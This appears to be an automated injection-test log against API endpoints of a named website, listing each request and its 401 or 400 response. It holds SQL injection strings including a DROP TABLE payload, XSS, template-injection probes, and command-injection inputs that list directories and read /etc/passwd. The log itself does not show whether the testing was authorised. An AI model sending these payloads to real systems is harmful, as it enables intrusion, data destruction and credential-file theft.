=== PHASE 3: API ENDPOINT INJECTION ===

--- Test: sqli_agentlib (GET) ---
URL: https://www.realwave.com/api/Academy/AgentLibrary?id=1'OR'1'='1
HTTP Code: 401
Response Headers:
HTTP/2 401
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:28 GMT

Response Body (first 500 chars):

=========================================

--- Test: sqli_lessons (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?id=1;DROP+TABLE+users--
HTTP Code: 401
Response Headers:
HTTP/2 401
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:28 GMT

Response Body (first 500 chars):

=========================================

--- Test: sqli_customers (GET) ---
URL: https://www.realwave.com/api/subscriptions/customers?email=test@test.com'+OR+'1'='1
HTTP Code: 401
Response Headers:
HTTP/2 401
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:29 GMT

Response Body (first 500 chars):

=========================================

--- Test: xss_user_path (GET) ---
URL: https://www.realwave.com/api/user/<script>alert(1)</script>
HTTP Code: 400
Response Headers:
HTTP/2 400
content-type: text/html; charset=us-ascii
server: Microsoft-HTTPAPI/2.0
date: Sat, 07 Feb 2026 05:45:29 GMT
content-length: 324

Response Body (first 500 chars):
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid URL</h2>
<hr><p>HTTP Error 400. The request URL is invalid.</p>
</BODY></HTML>

=========================================

--- Test: ssti_lessons_1 (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?q=%7B%7B7*7%7D%7D
HTTP Code: 401
Response Headers:
HTTP/2 401
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:30 GMT

Response Body (first 500 chars):

=========================================

--- Test: ssti_lessons_2 (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?q=${7*7}
HTTP Code: 401
Response Headers:
HTTP/2 401
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:30 GMT

Response Body (first 500 chars):

=========================================

--- Test: cmdi_file_1 (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?file=;ls+-la
HTTP Code: 401
Response Headers:
HTTP/2 401
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:32 GMT

Response Body (first 500 chars):

=========================================

--- Test: cmdi_file_2 (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?file=|cat+/etc/passwd
HTTP Code: 401
Response Headers:
HTTP/2 401
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:32 GMT

Response Body (first 500 chars):

=========================================

--- Test: xss_post_agentlib (POST) ---
HTTP Code: 401
HTTP/2 401
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:33 GMT

Body:

=========================================